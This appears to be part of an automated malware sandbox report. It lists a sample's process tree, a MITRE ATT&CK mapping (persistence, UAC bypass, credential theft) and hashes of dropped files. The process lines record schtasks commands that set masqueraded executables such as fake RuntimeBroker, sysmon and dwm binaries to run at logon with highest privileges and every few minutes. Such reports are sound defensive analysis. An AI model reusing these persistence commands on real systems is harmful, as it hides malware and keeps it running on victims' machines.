- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BlockDriversession" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\en-US\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:216
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2716
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:64
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:692
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2592
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
5Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1
Downloads
-
Filesize
2.2MB
MD5434137b47c58cd2fe43ac11c4ca57d5e
SHA1f17ed590355e712ffb46fbcf6c336d631e32b9bc
SHA256ac77250c3cf3f478d8c264221dca59315f9a960891b868e4bb1f2e828d5999f0
SHA51276854bce72e876c96511dccfab1251afab814fb2befcfc2d3f3e101de675d66c9885cae884ab7af62f7c195f825558b52329b683cfc6f6311da7ff528dfa1bdc
-
Filesize
2.2MB
MD50a2d7f0801cf45923878c7d9adf0d93f
SHA18803bcf53ee79ed739fa533eb16ebe6e94213756
SHA256b95abda288cf2017789151be02cebef9ac5c3f65a2c9b944abb78cb2c11b2160
SHA512682b1fa705e08356ee3829cee220d57655e5fe08cb0e857ad5cefdcb158f360b0206ccae26003c978d8c34c5979d16e1571ffc0d50c4b3ae2f7b2ee2320297e1
-
Filesize
1KB
MD5dbe63509a4414a1b42de4e989eaa127a
SHA1f108870e9963812f7cf20f284157c10649236557
SHA2567457812f3d13a281c9035c5276a186d9ffee2d6d3ffa28fbb27aaa6f3524305a
SHA5125515396cf904c2d26377834d3f8770b69a814a1e065d4a4f88d10a76f98c0bbb6302bc1d04faa5cc49f39667707219164eea2c8e0d670f0f9e5a85f1f93f23c2
-
Filesize
700B
MD57f421413a3a37b7165efde5c994a54f0
SHA1c8d27a7bd60a62763eec31af7803104219330878
SHA2566bdef59ce5299cd28eb10dadc036161b8f4d0a11c384aeeb88a6b7ddee404a26
SHA512a603ec11a00ed1d9ccd58f6f414df7a6550a3f2fe3aaf953aac13cf1bf3a8983e2f1622fdf8fe50b957bc5e70ef83b6d5401b305c16ec1eb51314a8606aa3eda
-
Filesize
477B
MD57aedbf4c51e2d9287a7b8cc951bd82df
SHA152d3fe8bbc6a569941b87e0e1993926c25b87a8b
SHA256b0b76a49e2c6f1e4b38004bb432b88f62e956d138302ca0185951cf751ced776
SHA512966395869d1a4b78785c55271120969f5a2adbe493ba9fe12c35f69811964230f8721ec42f6deb981508e4424b6a630c3654dfcc7450c3556bac6a3a08d3a7e3
-
Filesize
701B
MD5b4ba1732d0b4e87036be70a698c800a3
SHA193f3ce12224bbe2860f92695bc1c73b7deb3f161
SHA2567f7fe3ff12387c088a9e176dbc018bb743f623e4436fd2334ef9032cbd35743d
SHA5129e8dd2c2bc0482d864183c72ad198de956e756e5514183810233ad227050817e61006ae97ae82032315791f15f080d37284ec40aff0d9ecb5c513a13dad92ccf
-
Filesize
190B
MD5b50d517895549466ce69c06aef1a4bda
SHA1668bfdae9b038da22825aa994ac8f3fbcbe1a361
SHA256139c9b42aa1f4df66fb4d7aeebcb558febc1d61953f7b34a1d04f57579f8f079
SHA5129e92c4c89206aebd63720f3d29b808e650c7d5357e8dd66ddf0a3f004135c70a5782fdedf5fce4e7684eeb1781f1d40d52430fb2b8a070cb68703c1e480f2bf1
-
Filesize
190B
MD584ff98f75b6d70e2f33e3b6ee2f807c7
SHA1ef9c61f4342ac6c5eb838513965c61577e3ebf09
SHA2568425367e13a42d3d172649299847377af94d64401d102e6bace63e4bf5830ac6
SHA5124397ac9830598d25779d25cb38256c9f528d1323947fe2f70f7ef33f608d2fb6448fbd37477d67fb0911178cbf2c4523028053f6f28db87450fb13317190a10b
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
190B
MD52ee029f89fe388b8f9af76112e5abcb9
SHA1c99baac7c654a852bc1d0801425755f86647d984
SHA256d6f49b77a7392080f0e5c1cf22095c35cf9f4d49631e7ce031bd028e25019902
SHA512b59d8b18294473e67160ea63ea2706e5690bd4deda18553b39c026159559ccdce60cfefbb09240634bdd0a8c4c64df071a76e92a1a109e4c5ffff99131f2eb25
-
Filesize
190B
MD5ff63ce24e7c1de05209c7ed7003f243a
SHA1ed47a21be8fcdf76f40f9f07e4797a1aafdad6e3
SHA256bde8074217573f4e467dabf68ae8b8a3b8156eb3aafab19c28e85dd33b1f8f22
SHA51207693687c162c3f7cdd77a6b7528f3784a00ba024da5d4f59c13e3be2b49ec25fcf7a9aee0b4f68f746ff0cd5471dc1fc9e2a5abbcb61b5431d3e1f7454f6ae0
-
Filesize
190B
MD54755150d128aa205408ac2f36c3f6493
SHA141fa8b516a3fc55681c4a945c549f4290ebcb637
SHA256eb9b28d211d13cabe713a71cff90c1be0fae977f3d399cd4e97ca8108bf4cead
SHA512ae965e44a0725dd459a7fbe9877881c1cfe098b63ce453a300da7f6b344a17ade20a814e80cbbbd814dd139ada1e64eb83234d5a7902415a0d31c5f4369631fb
-
Filesize
190B
MD51c0c4ea45725747ba2d15a78b95ef8c1
SHA1ba5c8bf2264964e378d4d3a8806bc5feef4aa1a2
SHA2569dc5e176810fa96ede65d1697a08eeed931677a94f6341abc5f7c7c869ec4d5a
SHA51221a77bb61723f385c6178f8d1e14b6b9cba0c5b2a6bbea180e3f51927d3836c72aeea7a044d3e9971554997882307665e91b8f8d993bcee9ad5c597f00007aea
-
Filesize
190B
MD59ffdb720efacf3af78a449400886e4fb
SHA1313709a32732ae58084371ac4ac3c3b4f69e9835
SHA2565bfc7c9afb977b6d681c822a228c83777092385b6d9356c6c09b338b915f68b6
SHA5122ed8e7e058a951317f30a42957fcaffcc1e097f901b05fc1a4ce091b81453355efd15407f555e387ec1418338e7e803bd506609b4d41901dfec23db904c698e2
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
114KB
MD52ba42ee03f1c6909ca8a6575bd08257a
SHA188b18450a4d9cc88e5f27c8d11c0323f475d1ae6
SHA256a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd
SHA512a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035
-
Filesize
190B
MD580ef4d52535ac7ba24669e9e97773ae3
SHA15583a366e90d636f61b136bbe0c8f0969d7558b2
SHA25657d0a97abaade2e4445b29baec8956327ec802f777fcb8046a89b22d4d9dc80b
SHA512e4440d12c86084ff043752e8a3949912dc3fcc0f1d7de78d7849e5440b952e4f33749f6634595c3e6ae0a5a2aec6e85b2fe5a5031669362ca798c3a2dbb4c3cb
-
Filesize
190B
MD5b0e0d35861d05db2b04a09234bde37c8
SHA19b2d6f399bf6b32e42866ff302c19104fdccc5b0
SHA25692cb7c32841532ed56d7c4e4b88db2a1ee0ac10aad3bda281f983c563266d20e
SHA5128b82f606fb6a934614193d7e5d63761e10822b3c51436f74a25f9742d50a95a17fe5d85d47b25423afb3882cb742b6035dabb3232989126c6828fc595c7a1e8e
-
Filesize
2.2MB
MD5d49b746e993d91bc41fdba6a27ca17bc
SHA1bc117ad939425c7c2ddb49024357b9c2fbbb53f5
SHA256d7f5f19740d24e6320d80820d3a3bbc2dc24f54711ac1c62ef2d971d9f2cc0ad
SHA512f4d75b2f5265449154bc0aea2c2a0eb4407f402da752a0486681433d0981bf4a3cc6e6102efe53010b6a033e9b5114643c2375369cacd0512a88be9f328d49fd
-
Filesize
2.2MB
MD54f18ea86161e94a4702bc197a9b28ee8
SHA1d71a1fdd09d177f6df67070fc2d9c9442f62bdf3
SHA256db0be9d56dbbd7947d9426408d4737eab35efb894f557444ed9256627f9d0439
SHA512fb726fd16cc5572ae373b14219dbff4d646109b2602af6158a11b522aa6a09b9ca3b1e83c016e25e77d01b39f364f96eae745bfdf341916cae1080568adfc071
-
Filesize
2.2MB
MD5f311f1b22f15adeb06c90a4007669c6f
SHA18e8374d2a7f47c64f7ba119f49c418709f8f14f5
SHA25614c9c44939d0f16e6d7c88902126290e23a12ad6889a81ead97e82bc4ec5cf3d
SHA512359383a159be1a1c9a564616cb71e234a7a42346233b03d4df2af6774f6dd713c5ab844fb3e7df99048d6a7b96990afc459d7a3d2026d3a62d86266677d5e093
-
Filesize
2.2MB
MD51c6457696f89995d1d3140df11bb13d8
SHA19ce32ce6cd29863252e71f1b0246a18879d72020
SHA256c16bc78cb749185c3a983fe9b739b3d47fd79265b0fc7c3c9527a2f0e9599294
SHA51271dd011a43a4c71d692505006831449390cd0a9febc1b0b215d141cacbc603b1b13945d356ae4a2c6ecec2fbd4e43d6d714cac3505fec94e453e6da814f670f5
-
Filesize
210B
MD5df0c2d3f2c34d6585dab72e7c7e68ee2
SHA139a9526dbbd2fb22ecb42dff06dc24b4b0f2101a
SHA2567f161d5bd44126e0933e733b46b0c4912db345667277506cc78d08a9464bb3e0
SHA5128bf10e01a9024173bfb06313932a151e601c97178b00e885e25509ea30bdc5f00017943d67095725f2d3dde608d4f6126ac52166639831f17d3ee3ae391e64a3
-
Filesize
151B
MD59057cf6aa3be25586ce999472ed54810
SHA16f608a8f42892b7bb5383cbe5a3f0c6d7b66e45f
SHA256f795fe0dcca481ca1f45663140832c1e3bf8c6d37f33712c67ae5d5dc90482ae
SHA5127829c023b2dfce5751703ca26d1510d045e7c29ebe8ed086e65151eb22d0306316b26acda3a5d50568c42f94c8b42a762525adbaae4f4f39f6ceba05ec82f0f6
-
Filesize
2.2MB
MD5f37fb0a09c0e0805c252a01e90919328
SHA1bb1268dc15a4923e5602390a7858cba9b1457367
SHA2564053601c096a144af686facf800e9c6a6d2f51c07edd64c4f945efd9f15ea91c
SHA512be2c6dbaa5b07ee5172b73f5fac325e65b13c1db94e4306c4f81e35f4a777d4eccbdc6ee479d22ba928cb7ac6148fb2a30b8313a72c0f97a292a3a46765c6aa7